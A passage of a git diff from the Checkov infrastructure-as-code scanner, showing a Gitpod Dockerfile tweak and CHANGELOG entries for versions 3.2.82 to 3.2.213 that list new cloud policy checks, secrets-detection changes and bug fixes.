gitpod/workspace-python -RUN pyenv install 3.7.12 +RUN pyenv install 3.10.14 RUN wget -q -O get_kustomize.sh https://raw.githubusercontent.com/kubernetes-sigs/kustomize/master/hack/install_kustomize.sh; \ chmod 700 get_kustomize.sh; \ mkdir -p /usr/local/bin; \ diff --git a/CHANGELOG.md b/CHANGELOG.md index 0211eceb116..03234efdf77 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md 
@@ -1,6 +1,863 @@ # CHANGELOG -## [Unreleased](https://github.com/bridgecrewio/checkov/compare/3.2.12...HEAD) +## [Unreleased](https://github.com/bridgecrewio/checkov/compare/3.2.213...HEAD) + +## [3.2.213](https://github.com/bridgecrewio/checkov/compare/3.2.209...3.2.213) - 2024-07-29 + +### Feature + +- **arm:** ARM AppServiceInstanceMinimum - CKV_AZURE_212 - [#6502](https://github.com/bridgecrewio/checkov/pull/6502) +- **terraform:** - TF and CFN - Add a policy for ensuring AWS Bedrock Agent is encrypted with a CMK - [#6603](https://github.com/bridgecrewio/checkov/pull/6603) + +### Bug Fix + +- **ansible:** Fix CKV2_ANSIBLE_2 - [#6610](https://github.com/bridgecrewio/checkov/pull/6610) +- **arm:** Support upper and lower disabled for CKV_AZURE_189 - [#6609](https://github.com/bridgecrewio/checkov/pull/6609) +- **dockerfile:** Fix edge case with apt in domain - [#6611](https://github.com/bridgecrewio/checkov/pull/6611) +- **terraform_plan:** Fix parsing other types of provisioners - [#6606](https://github.com/bridgecrewio/checkov/pull/6606) +- **terraform:** add condition for CKV_AWS_353 - [#6607](https://github.com/bridgecrewio/checkov/pull/6607) +- **terraform:** catch unknowns with WAF configs - [#6612](https://github.com/bridgecrewio/checkov/pull/6612) +- **terraform:** Handle default for CKV_GCP_76 - [#6608](https://github.com/bridgecrewio/checkov/pull/6608) + +## [3.2.209](https://github.com/bridgecrewio/checkov/compare/3.2.208...3.2.209) - 2024-07-28 + +### Feature + +- **cloudformation:** Enrich cloudsplaining eval keys - [#6602](https://github.com/bridgecrewio/checkov/pull/6602) + +### Documentation + +- **general:** add --repo-id to relevant examples with API key - [#6605](https://github.com/bridgecrewio/checkov/pull/6605) + +## [3.2.208](https://github.com/bridgecrewio/checkov/compare/3.2.204...3.2.208) - 2024-07-25 + +### Feature + +- **general:** filter resource by provider for all resources types - 
[#6598](https://github.com/bridgecrewio/checkov/pull/6598) +- **secrets:** add CKV_SECRET_192 to GENERIC_PRIVATE_KEY_CHECK_IDS - [#6600](https://github.com/bridgecrewio/checkov/pull/6600) +- **terraform:** Update ckv-aws-8 policy - support unknown statement - [#6596](https://github.com/bridgecrewio/checkov/pull/6596) + +### Bug Fix + +- **terraform:** Fix resource type for CKV_AZURE_242 - [#6599](https://github.com/bridgecrewio/checkov/pull/6599) + +### Platform + +- **general:** handle multiple values for the same metadata filter - [#6604](https://github.com/bridgecrewio/checkov/pull/6604) + +## [3.2.204](https://github.com/bridgecrewio/checkov/compare/3.2.201...3.2.204) - 2024-07-24 + +### Feature + +- **arm:** add CKV_AZURE_191 to ensure that Managed identity provider is enabled for Azure Event Grid Topic - [#6496](https://github.com/bridgecrewio/checkov/pull/6496) + +### Bug Fix + +- **sast:** BCE-36172 fix cdk policies - [#6588](https://github.com/bridgecrewio/checkov/pull/6588) + +## [3.2.201](https://github.com/bridgecrewio/checkov/compare/3.2.199...3.2.201) - 2024-07-23 + +### Feature + +- **terraform:** add 14 rules for tencentcloud provider - [#6448](https://github.com/bridgecrewio/checkov/pull/6448) + +### Bug Fix + +- **secrets:** fix secrets prerun bug - [#6594](https://github.com/bridgecrewio/checkov/pull/6594) +- **terraform:** Exclude String in CKV_AWS_337 - [#6592](https://github.com/bridgecrewio/checkov/pull/6592) + +## [3.2.199](https://github.com/bridgecrewio/checkov/compare/3.2.196...3.2.199) - 2024-07-22 + +### Feature + +- **arm:** add CKV_AZURE_87 to ensure that Azure Defender is set to On for Key Vault - [#6418](https://github.com/bridgecrewio/checkov/pull/6418) +- **arm:** ARM VnetSingleDNSServer - [#6379](https://github.com/bridgecrewio/checkov/pull/6379) +- **secrets:** Adding the option to prerun before multiline pattern executing - [#6586](https://github.com/bridgecrewio/checkov/pull/6586) +- **secrets:** If the prrun regex found but 
we already scanned file we already scann… - [#6591](https://github.com/bridgecrewio/checkov/pull/6591) + +## [3.2.196](https://github.com/bridgecrewio/checkov/compare/3.2.194...3.2.196) - 2024-07-21 + +### Feature + +- **general:** Add metadata exception filter to GHA - [#6583](https://github.com/bridgecrewio/checkov/pull/6583) +- **general:** Refactor all resource type handling in Checkov - [#6572](https://github.com/bridgecrewio/checkov/pull/6572) + +## [3.2.194](https://github.com/bridgecrewio/checkov/compare/3.2.193...3.2.194) - 2024-07-18 + +### Feature + +- **arm:** AKSEncryptionAtHostEnable - [#6575](https://github.com/bridgecrewio/checkov/pull/6575) +- **arm:** AKSEphemeralOSDisks - [#6578](https://github.com/bridgecrewio/checkov/pull/6578) +- **arm:** CKV_AZURE_92 to Ensure that Virtual Machines use managed disks - [#6455](https://github.com/bridgecrewio/checkov/pull/6455) +- **arm:** FrontDoorWAFACLCVE202144228 - Mitigates the Log4j2 vulnerability CVE-2021-44228. - [#6419](https://github.com/bridgecrewio/checkov/pull/6419) + +### Bug Fix + +- **general:** fix the right numbers in TestSkipJsonRegexPattern - [#6580](https://github.com/bridgecrewio/checkov/pull/6580) +- **terraform:** Fix title of CKV_AZURE_238 - [#6570](https://github.com/bridgecrewio/checkov/pull/6570) + +## [3.2.193](https://github.com/bridgecrewio/checkov/compare/3.2.191...3.2.193) - 2024-07-17 + +### Bug Fix + +- **terraform:** fix failures of no caller on definition context - [#6573](https://github.com/bridgecrewio/checkov/pull/6573) +- **terraform:** TFPlan + TF fixes for google_project_iam_policy + google_iam_policy - [#6577](https://github.com/bridgecrewio/checkov/pull/6577) + +## [3.2.191](https://github.com/bridgecrewio/checkov/compare/3.2.190...3.2.191) - 2024-07-16 + +### Bug Fix + +- **general:** fix sca unit tests for python 3.12 - [#6574](https://github.com/bridgecrewio/checkov/pull/6574) + +## [3.2.190](https://github.com/bridgecrewio/checkov/compare/3.2.189...3.2.190) - 
2024-07-15 + +- no noteworthy changes + +## [3.2.189](https://github.com/bridgecrewio/checkov/compare/3.2.186...3.2.189) - 2024-07-14 + +### Feature + +- **arm:** add CKV_AZURE_169 to ensure that AKS use the Paid Sku for its SLA - [#6545](https://github.com/bridgecrewio/checkov/pull/6545) +- **arm:** add CKV_AZURE_177 to ensure that Windows VM enables automatic updates - [#6484](https://github.com/bridgecrewio/checkov/pull/6484) +- **cloudformation:** Update audit_logs valid values - [#6566](https://github.com/bridgecrewio/checkov/pull/6566) + +## [3.2.186](https://github.com/bridgecrewio/checkov/compare/3.2.183...3.2.186) - 2024-07-11 + +### Feature + +- **azure:** add new policies for Azure Synapse (tf and arm) - [#6554](https://github.com/bridgecrewio/checkov/pull/6554) +- **bicep:** support bicep custom policy - [#6561](https://github.com/bridgecrewio/checkov/pull/6561) + +### Bug Fix + +- **arm:** CKV_AZURE_56 just for authsettingsV2 name - [#6557](https://github.com/bridgecrewio/checkov/pull/6557) +- **secrets:** filter secrets that have vault: in them - [#6565](https://github.com/bridgecrewio/checkov/pull/6565) + +## [3.2.183](https://github.com/bridgecrewio/checkov/compare/3.2.179...3.2.183) - 2024-07-10 + +### Feature + +- **terraform_plan:** support tf_plan after_unknown enrichment - [#6517](https://github.com/bridgecrewio/checkov/pull/6517) + +### Bug Fix + +- **secrets:** small fix for filtering - [#6562](https://github.com/bridgecrewio/checkov/pull/6562) + +### Platform + +- **general:** pass repo ID to runconfig - [#6560](https://github.com/bridgecrewio/checkov/pull/6560) + +## [3.2.179](https://github.com/bridgecrewio/checkov/compare/3.2.177...3.2.179) - 2024-07-09 + +### Feature + +- **arm:** add CKV_AZURE_206 to ensure that Storage Accounts use replication - [#6524](https://github.com/bridgecrewio/checkov/pull/6524) +- **arm:** BCE-33785 Support Azure Synapse Analytics policies - [#6513](https://github.com/bridgecrewio/checkov/pull/6513) + +## 
[3.2.177](https://github.com/bridgecrewio/checkov/compare/3.2.175...3.2.177) - 2024-07-08 + +### Bug Fix + +- **sast:** fix cdk policies - [#6552](https://github.com/bridgecrewio/checkov/pull/6552) + +## [3.2.175](https://github.com/bridgecrewio/checkov/compare/3.2.174...3.2.175) - 2024-07-07 + +### Feature + +- **arm:** AzureSearchSQLQueryUpdates - [#6543](https://github.com/bridgecrewio/checkov/pull/6543) + +## [3.2.174](https://github.com/bridgecrewio/checkov/compare/3.2.171...3.2.174) - 2024-07-04 + +### Feature + +- **arm:** add CKV_AZURE_172 to ensure autorotation of Secrets Store CSI Driver secrets for AKS clusters - [#6533](https://github.com/bridgecrewio/checkov/pull/6533) +- **arm:** add CKV_AZURE_173 to ensure that API management uses at least TLS 1.2 - [#6478](https://github.com/bridgecrewio/checkov/pull/6478) +- **arm:** AppServicePlanZoneRedundant - [#6472](https://github.com/bridgecrewio/checkov/pull/6472) +- **arm:** AzureSearchSLAIndex - [#6530](https://github.com/bridgecrewio/checkov/pull/6530) +- **arm:** SQLDatabaseZoneRedundant - [#6515](https://github.com/bridgecrewio/checkov/pull/6515) +- **azure:** add new policies for Azure Synapse - [#6520](https://github.com/bridgecrewio/checkov/pull/6520) +- **general:** update detect secrets package - [#6535](https://github.com/bridgecrewio/checkov/pull/6535) + +## [3.2.171](https://github.com/bridgecrewio/checkov/compare/3.2.164...3.2.171) - 2024-07-03 + +### Feature + +- **arm:** add CKV_AZURE_171 to ensure that AKS cluster upgrade channel is chosen - [#6532](https://github.com/bridgecrewio/checkov/pull/6532) +- **arm:** add CKV_AZURE_175 to ensure that Web PubSub uses a SKU with an SLA - [#6523](https://github.com/bridgecrewio/checkov/pull/6523) +- **arm:** add CKV_AZURE_178 to ensure that linux VM enables SSH with keys for secure communication - [#6486](https://github.com/bridgecrewio/checkov/pull/6486) +- **arm:** add CKV_AZURE_85 to ensure that Azure Defender is set to On for Kubernetes - 
[#6279](https://github.com/bridgecrewio/checkov/pull/6279) +- **arm:** CKV_AZURE_99 to Ensure Cosmos DB accounts have restricted access - [#6498](https://github.com/bridgecrewio/checkov/pull/6498) +- **arm:** DataFactoryNoPublicNetworkAccess - [#6479](https://github.com/bridgecrewio/checkov/pull/6479) +- **arm:** DataLakeStoreEncryption - [#6516](https://github.com/bridgecrewio/checkov/pull/6516) +- **arm:** EventHubNamespaceMinTLS12 - [#6485](https://github.com/bridgecrewio/checkov/pull/6485) + +### Bug Fix + +- **openapi:** [CKV_OPENAPI_3] Prevent false-positive when checking for http+!basic - [#6406](https://github.com/bridgecrewio/checkov/pull/6406) +- **terraform_json:** support locals block in CDKTF output - [#6452](https://github.com/bridgecrewio/checkov/pull/6452) +- **terraform:** Deprecate CKV2_AWS_67 - [#6529](https://github.com/bridgecrewio/checkov/pull/6529) + +## [3.2.164](https://github.com/bridgecrewio/checkov/compare/3.2.163...3.2.164) - 2024-07-02 + +### Documentation + +- **general:** Add Python note - [#6521](https://github.com/bridgecrewio/checkov/pull/6521) + +## [3.2.163](https://github.com/bridgecrewio/checkov/compare/3.2.159...3.2.163) - 2024-07-01 + +### Feature + +- **arm:** add CKV_AZURE_174 to ensure that API management public access is disabled - [#6480](https://github.com/bridgecrewio/checkov/pull/6480) +- **arm:** AppServicePHPVersion - [#6436](https://github.com/bridgecrewio/checkov/pull/6436) +- **arm:** AppServicePublicAccessDisabled - [#6467](https://github.com/bridgecrewio/checkov/pull/6467) +- **arm:** KeyVaultEnablesPurgeProtection - [#6465](https://github.com/bridgecrewio/checkov/pull/6465) +- **arm:** PubsubSpecifyIdentity - [#6483](https://github.com/bridgecrewio/checkov/pull/6483) + +## [3.2.159](https://github.com/bridgecrewio/checkov/compare/3.2.156...3.2.159) - 2024-06-30 + +### Bug Fix + +- **arm:** fix CKV_AZURE_78: `siteConfig` object should be under `properties` - 
[#6477](https://github.com/bridgecrewio/checkov/pull/6477) +- **general:** Mypy issues - [#6510](https://github.com/bridgecrewio/checkov/pull/6510) +- **terraform:** ignore comment out modules - [#6507](https://github.com/bridgecrewio/checkov/pull/6507) + +## [3.2.156](https://github.com/bridgecrewio/checkov/compare/3.2.145...3.2.156) - 2024-06-27 + +### Feature + +- **arm:** add CKV_AZURE_129 Ensure that MariaDB server enables geo-redundant backups - [#6427](https://github.com/bridgecrewio/checkov/pull/6427) +- **arm:** add CKV_AZURE_137 Ensure ACR admin account is disabled - [#6430](https://github.com/bridgecrewio/checkov/pull/6430) +- **arm:** add CKV_AZURE_139 Ensure ACR set to disable public networking - [#6428](https://github.com/bridgecrewio/checkov/pull/6428) +- **arm:** add CKV_AZURE_166 Ensure container image quarantine, scan, and mark images verified - [#6431](https://github.com/bridgecrewio/checkov/pull/6431) +- **arm:** add CKV_AZURE_168 to ensure that Azure Kubernetes Cluster (AKS) nodes should use a minimum number of 50 pods - [#6385](https://github.com/bridgecrewio/checkov/pull/6385) +- **arm:** add CKV_AZURE_45 to ensure that no sensitive credentials are exposed in VM custom_data - [#6422](https://github.com/bridgecrewio/checkov/pull/6422) +- **arm:** add CKV_AZURE_70 to ensure that Function apps is only accessible over HTTPS - [#6457](https://github.com/bridgecrewio/checkov/pull/6457) +- **arm:** ARM AppServiceSlotDebugDisabled - CKV_AZURE_155 - [#6453](https://github.com/bridgecrewio/checkov/pull/6453) +- **arm:** ARM AppServiceSlotHTTPSOnly - [#6454](https://github.com/bridgecrewio/checkov/pull/6454) +- **arm:** ARM VnetLocalDNS - [#6424](https://github.com/bridgecrewio/checkov/pull/6424) +- **arm:** PostgressSQLGeoBackupEnabled - [#6456](https://github.com/bridgecrewio/checkov/pull/6456) +- **arm:** StorageAccountName - [#6426](https://github.com/bridgecrewio/checkov/pull/6426) +- **secrets:** dont filter secrets - 
[#6508](https://github.com/bridgecrewio/checkov/pull/6508) + +### Bug Fix + +- **azure:** fix description of CKV_AZURE_236 - [#6503](https://github.com/bridgecrewio/checkov/pull/6503) +- **kubernetes:** Fix CKV_K8S_31 for CronJobs - [#6506](https://github.com/bridgecrewio/checkov/pull/6506) +- **sca:** fix parsing json with comments - [#6509](https://github.com/bridgecrewio/checkov/pull/6509) +- **terraform:** CKV_AWS_339 add Kubernetes 1.30 to AWS EKS version checks - [#6353](https://github.com/bridgecrewio/checkov/pull/6353) +- **terraform:** remove print from CKV_AWS_364 - [#6504](https://github.com/bridgecrewio/checkov/pull/6504) + +## [3.2.145](https://github.com/bridgecrewio/checkov/compare/3.2.144...3.2.145) - 2024-06-25 + +### Documentation + +- **general:** Note for feature requests - [#6497](https://github.com/bridgecrewio/checkov/pull/6497) + +## [3.2.144](https://github.com/bridgecrewio/checkov/compare/3.2.141...3.2.144) - 2024-06-23 + +### Bug Fix + +- **kubernetes:** ensure seccompProfile is set to RuntimeDefault for all containers in deployments and similar resources - [#6459](https://github.com/bridgecrewio/checkov/pull/6459) +- **terraform:** Add more conditions for CKV_AWS_70 - [#6464](https://github.com/bridgecrewio/checkov/pull/6464) + +## [3.2.141](https://github.com/bridgecrewio/checkov/compare/3.2.140...3.2.141) - 2024-06-19 + +### Bug Fix + +- **secrets:** dedup secrets history values - [#6462](https://github.com/bridgecrewio/checkov/pull/6462) + +## [3.2.140](https://github.com/bridgecrewio/checkov/compare/3.2.138...3.2.140) - 2024-06-18 + +### Feature + +- **azure:** fix ckv_azure_189 according to docs - [#6413](https://github.com/bridgecrewio/checkov/pull/6413) + +### Bug Fix + +- **sca:** Support parsing json with comments - [#6466](https://github.com/bridgecrewio/checkov/pull/6466) + +### Documentation + +- **general:** fix pre-commit link - [#6433](https://github.com/bridgecrewio/checkov/pull/6433) + +## 
[3.2.138](https://github.com/bridgecrewio/checkov/compare/3.2.136...3.2.138) - 2024-06-17 + +### Feature + +- **graph:** support creation of resource type allow/deny lists - [#6451](https://github.com/bridgecrewio/checkov/pull/6451) + +### Bug Fix + +- **terraform:** Fix name of CKV2_AWS_67 to be more clear - [#6434](https://github.com/bridgecrewio/checkov/pull/6434) +- **terraform:** Fix when apt is in rm statement - [#6437](https://github.com/bridgecrewio/checkov/pull/6437) +- **terraform:** Update CKV_AWS_224 title - [#6435](https://github.com/bridgecrewio/checkov/pull/6435) + +## [3.2.136](https://github.com/bridgecrewio/checkov/compare/3.2.133...3.2.136) - 2024-06-13 + +### Bug Fix + +- **arm:** Correct AzureMLWorkspacePrivateEndpoint rule check logic - [#6432](https://github.com/bridgecrewio/checkov/pull/6432) +- **general:** removed references Putin references - [#6445](https://github.com/bridgecrewio/checkov/pull/6445) + +## [3.2.133](https://github.com/bridgecrewio/checkov/compare/3.2.130...3.2.133) - 2024-06-10 + +### Feature + +- **general:** add AI_AND_ML to CheckCategories - [#6423](https://github.com/bridgecrewio/checkov/pull/6423) + +### Bug Fix + +- **sast:** Update CKV IDs for CDK policies - [#6415](https://github.com/bridgecrewio/checkov/pull/6415) + +## [3.2.130](https://github.com/bridgecrewio/checkov/compare/3.2.128...3.2.130) - 2024-06-09 + +### Feature + +- **arm:** add CKV_AZURE_135 to ensure Application Gateway WAF prevents message lookup in Log4j2. 
- [#6364](https://github.com/bridgecrewio/checkov/pull/6364) +- **arm:** add CKV_AZURE_140 to ensure that Local Authentication is disabled on CosmosDB - [#6329](https://github.com/bridgecrewio/checkov/pull/6329) +- **arm:** add CKV_AZURE_163 Enable vulnerability scanning for container images - [#6339](https://github.com/bridgecrewio/checkov/pull/6339) +- **arm:** add MariaDbPublicAccessDisabled convert policy to arm - [#6246](https://github.com/bridgecrewio/checkov/pull/6246) +- **arm:** AKSLocalAdminDisabled - [#6334](https://github.com/bridgecrewio/checkov/pull/6334) +- **arm:** AppServiceFTPSState - [#6363](https://github.com/bridgecrewio/checkov/pull/6363) +- **arm:** AzureServiceFabricClusterProtectionLevel - [#6366](https://github.com/bridgecrewio/checkov/pull/6366) +- **arm:** ensure ACR disables anonymous pulling of images (CKV_AZURE_138) - [#6373](https://github.com/bridgecrewio/checkov/pull/6373) +- **arm:** KeyVaultDisablesPublicNetworkAccess - [#6342](https://github.com/bridgecrewio/checkov/pull/6342) +- **arm:** PostgreSQLServerPublicAccessDisabled - [#6330](https://github.com/bridgecrewio/checkov/pull/6330) +- **terraform:** extract image referencers for AWS SageMaker - [#6408](https://github.com/bridgecrewio/checkov/pull/6408) + +### Bug Fix + +- **ansible:** add dict check in create_tasks_vertices - [#6417](https://github.com/bridgecrewio/checkov/pull/6417) + +## [3.2.128](https://github.com/bridgecrewio/checkov/compare/3.2.125...3.2.128) - 2024-06-06 + +### Feature + +- **azure:** drop support for dotnet v7.0 - [#6383](https://github.com/bridgecrewio/checkov/pull/6383) +- **general:** Image Referencer should not run for CI workflow files - [#6386](https://github.com/bridgecrewio/checkov/pull/6386) +- **secrets:** Add _prioritise_secrets by 3 levels of severity - [#6390](https://github.com/bridgecrewio/checkov/pull/6390) +- **terraform:** add 5 policies - [#6401](https://github.com/bridgecrewio/checkov/pull/6401) +- **terraform:** add 6 policies - 
[#6396](https://github.com/bridgecrewio/checkov/pull/6396) +- **terraform:** add fix for ckv_aws_300 - [#6404](https://github.com/bridgecrewio/checkov/pull/6404) +- **terraform:** add fix for not contains solver - [#6389](https://github.com/bridgecrewio/checkov/pull/6389) + +### Bug Fix + +- **ansible:** filter conf if its int or float - [#6409](https://github.com/bridgecrewio/checkov/pull/6409) +- **general:** add try except gihub_action read file - [#6411](https://github.com/bridgecrewio/checkov/pull/6411) +- **general:** bitbucket integration test failure - [#6407](https://github.com/bridgecrewio/checkov/pull/6407) +- **general:** CKV2_AZURE_50 generates false positive azurerm_storage_account violations - [#6391](https://github.com/bridgecrewio/checkov/pull/6391) +- **sast:** add log for sast on windows - [#6397](https://github.com/bridgecrewio/checkov/pull/6397) + +## [3.2.125](https://github.com/bridgecrewio/checkov/compare/3.2.124...3.2.125) - 2024-06-03 + +### Feature + +- **arm:** Add check for AzureML workspace not configured with private endpoint - [#6387](https://github.com/bridgecrewio/checkov/pull/6387) + +## [3.2.124](https://github.com/bridgecrewio/checkov/compare/3.2.122...3.2.124) - 2024-06-02 + +### Feature + +- **azure:** Add policy to ensure proper AzureML Workspace network access - [#6362](https://github.com/bridgecrewio/checkov/pull/6362) +- **azure:** Ensure Azure Storage Account storing Machine Learning workspace high business impact data is not publicly accessible - [#6368](https://github.com/bridgecrewio/checkov/pull/6368) + +## [3.2.122](https://github.com/bridgecrewio/checkov/compare/3.2.121...3.2.122) - 2024-06-01 + +### Feature + +- **arm:** AppServicePythonVersion - 82 check the 'python version' is the latest, if used to run the web app - [#6282](https://github.com/bridgecrewio/checkov/pull/6282) + +## [3.2.121](https://github.com/bridgecrewio/checkov/compare/3.2.119...3.2.121) - 2024-05-31 + +### Feature + +- **terraform:** AWS 
SageMaker notebook instance KMS Key - [#6374](https://github.com/bridgecrewio/checkov/pull/6374) +- **terraform:** CognitiveServicesConfigureIdentity - new check - [#6378](https://github.com/bridgecrewio/checkov/pull/6378) +- **terraform:** Ensure that Cognitive Services accounts enable local authentication - new check - [#6377](https://github.com/bridgecrewio/checkov/pull/6377) + +## [3.2.119](https://github.com/bridgecrewio/checkov/compare/3.2.112...3.2.119) - 2024-05-30 + +### Feature + +- **arm:** add FunctionAppsEnableAuthentication - Checking if a certain field exists - [#6250](https://github.com/bridgecrewio/checkov/pull/6250) +- **terraform:** Add more conditions to CKV_AWS_70 - [#6371](https://github.com/bridgecrewio/checkov/pull/6371) +- **terraform:** Added the CKV2_AWS_68 Check for TF and CFN - [#6369](https://github.com/bridgecrewio/checkov/pull/6369) + +### Bug Fix + +- **ansible:** set task as ansible vertices config - [#6376](https://github.com/bridgecrewio/checkov/pull/6376) +- **terraform:** for_each/count attribute wasn't rendering if referencing a dynamic variable of a higher level module - [#6372](https://github.com/bridgecrewio/checkov/pull/6372) + +## [3.2.112](https://github.com/bridgecrewio/checkov/compare/3.2.108...3.2.112) - 2024-05-29 + +### Feature + +- **terraform:** Add provider address to resources - [#6266](https://github.com/bridgecrewio/checkov/pull/6266) +- **terraform:** Support for count & for_each in data blocks - [#6359](https://github.com/bridgecrewio/checkov/pull/6359) + +### Bug Fix + +- **terraform:** Fix an issue for loading tfvars + issue in the dynamic rendering - [#6360](https://github.com/bridgecrewio/checkov/pull/6360) + +## [3.2.108](https://github.com/bridgecrewio/checkov/compare/3.2.107...3.2.108) - 2024-05-26 + +### Bug Fix + +- **sast:** don't scan hidden files - [#6349](https://github.com/bridgecrewio/checkov/pull/6349) + +## [3.2.107](https://github.com/bridgecrewio/checkov/compare/3.2.106...3.2.107) - 
2024-05-24 + +### Bug Fix + +- **terraform:** Handle registry modules with a version in CKF_TF_2 - [#6354](https://github.com/bridgecrewio/checkov/pull/6354) + +## [3.2.106](https://github.com/bridgecrewio/checkov/compare/3.2.105...3.2.106) - 2024-05-23 + +### Feature + +- **arm:** Ensure Databricks Workspace data plane to control plane co… - [#6319](https://github.com/bridgecrewio/checkov/pull/6319) +- **general:** TF and ARM - Ensure that Databricks Workspaces enable… - [#6313](https://github.com/bridgecrewio/checkov/pull/6313) +- **secrets:** Bump detect-secrets - [#6346](https://github.com/bridgecrewio/checkov/pull/6346) + +## [3.2.105](https://github.com/bridgecrewio/checkov/compare/3.2.100...3.2.105) - 2024-05-22 + +### Feature + +- **arm:** add AppServiceJavaVersion - [#6258](https://github.com/bridgecrewio/checkov/pull/6258) +- **arm:** add CKV_AZURE_145 to check that the function app uses the latest version of TLS encryption - [#6323](https://github.com/bridgecrewio/checkov/pull/6323) +- **arm:** add CKV_AZURE_218 to ensure that Application Gateway defines secure protocols for in transit communicationApp gw defines secure protocols - [#6320](https://github.com/bridgecrewio/checkov/pull/6320) +- **arm:** add CKV_AZURE_54 to ensure Enforce a minimal Tls version for the server - [#6270](https://github.com/bridgecrewio/checkov/pull/6270) +- **arm:** add CKV_AZURE_71 to Ensure that Managed identity provider is enabled for web apps - [#6272](https://github.com/bridgecrewio/checkov/pull/6272) +- **arm:** add CKV_AZURE_72 to ensure that remote debugging is not enabled for app services - [#6281](https://github.com/bridgecrewio/checkov/pull/6281) +- **arm:** AzureDefenderOStorage - [#6269](https://github.com/bridgecrewio/checkov/pull/6269) +- **arm:** MySQLPublicAccessDisabled-Azure MySQL: Restrict Public Access - [#6263](https://github.com/bridgecrewio/checkov/pull/6263) +- **arm:** StorageSyncPublicAccessDisabled - 
[#6331](https://github.com/bridgecrewio/checkov/pull/6331) +- **secrets:** eliminate false positives in entropy keyword combinator detector - [#6327](https://github.com/bridgecrewio/checkov/pull/6327) + +### Bug Fix + +- **ansible:** fix ansible resource id in local graph - [#6344](https://github.com/bridgecrewio/checkov/pull/6344) +- **secrets:** fix entropy type - [#6347](https://github.com/bridgecrewio/checkov/pull/6347) + +## [3.2.100](https://github.com/bridgecrewio/checkov/compare/3.2.98...3.2.100) - 2024-05-21 + +### Feature + +- **sast:** TS-legacy-checks - [#6311](https://github.com/bridgecrewio/checkov/pull/6311) +- **secrets:** entropy limit as env variable - [#6332](https://github.com/bridgecrewio/checkov/pull/6332) + +## [3.2.98](https://github.com/bridgecrewio/checkov/compare/3.2.97...3.2.98) - 2024-05-20 + +### Bug Fix + +- **terraform:** Remove invalid CIDRs in CKV2_AWS_44 - [#6301](https://github.com/bridgecrewio/checkov/pull/6301) + +## [3.2.97](https://github.com/bridgecrewio/checkov/compare/3.2.95...3.2.97) - 2024-05-19 + +### Feature + +- **arm:** add CKV_AZURE_73 to ensure that Automation account variables are encrypted - [#6271](https://github.com/bridgecrewio/checkov/pull/6271) +- **arm:** add CKV_AZURE_76 to ensure that Azure Batch account uses key vault to encrypt data - [#6280](https://github.com/bridgecrewio/checkov/pull/6280) +- **arm:** add FunctionAppDisallowCORS - password correctness check - [#6248](https://github.com/bridgecrewio/checkov/pull/6248) +- **arm:** ARM FunctionAppHttpVersionLatest policy - [#6244](https://github.com/bridgecrewio/checkov/pull/6244) +- **arm:** CKV_AZURE_74 to Ensure that Azure Data Explorer (Kusto) uses disk encryption - [#6273](https://github.com/bridgecrewio/checkov/pull/6273) +- **arm:** MSSQLServerMinTLSVersion - [#6245](https://github.com/bridgecrewio/checkov/pull/6245) + +## [3.2.95](https://github.com/bridgecrewio/checkov/compare/3.2.94...3.2.95) - 2024-05-17 + +### Bug Fix + +- **terraform:** 
handle module source tag ref when it is not the first parameter - [#6314](https://github.com/bridgecrewio/checkov/pull/6314) + +## [3.2.94](https://github.com/bridgecrewio/checkov/compare/3.2.92...3.2.94) - 2024-05-16 + +### Bug Fix + +- **sast:** fix random test sast js - [#6315](https://github.com/bridgecrewio/checkov/pull/6315) + +### Platform + +- **general:** Double-Encode URI for RelayState Parameter - [#6302](https://github.com/bridgecrewio/checkov/pull/6302) + +## [3.2.92](https://github.com/bridgecrewio/checkov/compare/3.2.91...3.2.92) - 2024-05-15 + +### Feature + +- **sast:** CDK TypeScript policies - [#6161](https://github.com/bridgecrewio/checkov/pull/6161) +- **terraform:** add check for tf module versioned tag - [#6213](https://github.com/bridgecrewio/checkov/pull/6213) + +### Bug Fix + +- **secrets:** secret_filter_block_list filter by file name and suffixes - [#6285](https://github.com/bridgecrewio/checkov/pull/6285) +- **secrets:** secret_filter_block_list filter by file name and suffixes 2 - [#6306](https://github.com/bridgecrewio/checkov/pull/6306) + +### Platform + +- **general:** Fix policy.name to use the spaces as specified on CLI. 
- [#6296](https://github.com/bridgecrewio/checkov/pull/6296) + +## [3.2.91](https://github.com/bridgecrewio/checkov/compare/3.2.90...3.2.91) - 2024-05-12 + +### Feature + +- **secrets:** bump bc-detect-secrets to 1.5.10 - [#6297](https://github.com/bridgecrewio/checkov/pull/6297) + +## [3.2.90](https://github.com/bridgecrewio/checkov/compare/3.2.85...3.2.90) - 2024-05-09 + +### Feature + +- **general:** Add deep-analysis to GHA - [#6288](https://github.com/bridgecrewio/checkov/pull/6288) +- **terraform:** Add more hype policies - [#6239](https://github.com/bridgecrewio/checkov/pull/6239) + +### Bug Fix + +- **ansible:** fix ansible definitions raw type - [#6292](https://github.com/bridgecrewio/checkov/pull/6292) + +### Platform + +- **ansible:** add set definitions raw to ansible runner - [#6286](https://github.com/bridgecrewio/checkov/pull/6286) +- **general:** Handle SAST suppressions (suppressions V2) - [#6109](https://github.com/bridgecrewio/checkov/pull/6109) + +### Documentation + +- **general:** add RENDER_EDGES_DUPLICATE_ITER_COUNT to docs - [#6291](https://github.com/bridgecrewio/checkov/pull/6291) +- **general:** Update README links for PyPi - [#6231](https://github.com/bridgecrewio/checkov/pull/6231) + +## [3.2.85](https://github.com/bridgecrewio/checkov/compare/3.2.84...3.2.85) - 2024-05-08 + +### Platform + +- **ansible:** add missing arg to ansible runner - [#6276](https://github.com/bridgecrewio/checkov/pull/6276) + +## [3.2.84](https://github.com/bridgecrewio/checkov/compare/3.2.82...3.2.84) - 2024-05-07 + +### Feature + +- **sast:** Enable cdk ts integraion test - [#6158](https://github.com/bridgecrewio/checkov/pull/6158) + +### Bug Fix + +- **secrets:** add files for secret to skip - [#6275](https://github.com/bridgecrewio/checkov/pull/6275) +- **terraform:** Update CKV_AWS_31 for RBAC - [#6224](https://github.com/bridgecrewio/checkov/pull/6224) + +## [3.2.82](https://github.com/bridgecrewio/checkov/compare/3.2.79...3.2.82) - 2024-05-06 + +### 
